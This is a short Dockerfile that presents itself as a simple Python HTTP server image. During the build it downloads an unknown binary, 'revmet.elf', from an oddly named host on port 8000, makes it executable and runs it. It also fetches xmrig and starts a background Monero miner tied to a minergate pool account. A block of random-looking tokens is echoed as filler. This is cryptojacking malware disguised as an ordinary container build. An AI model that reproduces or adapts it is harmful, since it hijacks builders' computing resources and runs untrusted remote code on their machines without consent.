FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo zoK3L47T2QXzSQ6nBDhBnueoevTFZYb6 FFsDi9Y9NtRGU8IN0ym9K65MD0kQRgSm DoXhPgaNt9RKEENprHnc9FqcDwn6j5h1 hmMuLn0xXgMEV762SJQ1XSippSGvcnrg ZszIkREF2UCJ97UAliVv24Smf0pZZx92 8B9ShHGOuX996wR7NbpjzQpaBGe3y3iF zvotQyTxIiHVAbvCz6iBoaP0CwgVEC76 lyoFXRDOXxVEEfjDrBHZr6v3toWDa4oW FV06wx35NPib4vxX1KVLBVjoupEq2U6i vHGxVrHHZ9Hd5RCdTrVWY6ao2lgGC8yd jAmErPwN7CUbmmRef3C5TEJiblgJmVaf wZSicUo5ap4PSsN6TuDrmYAQpQtitviP DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]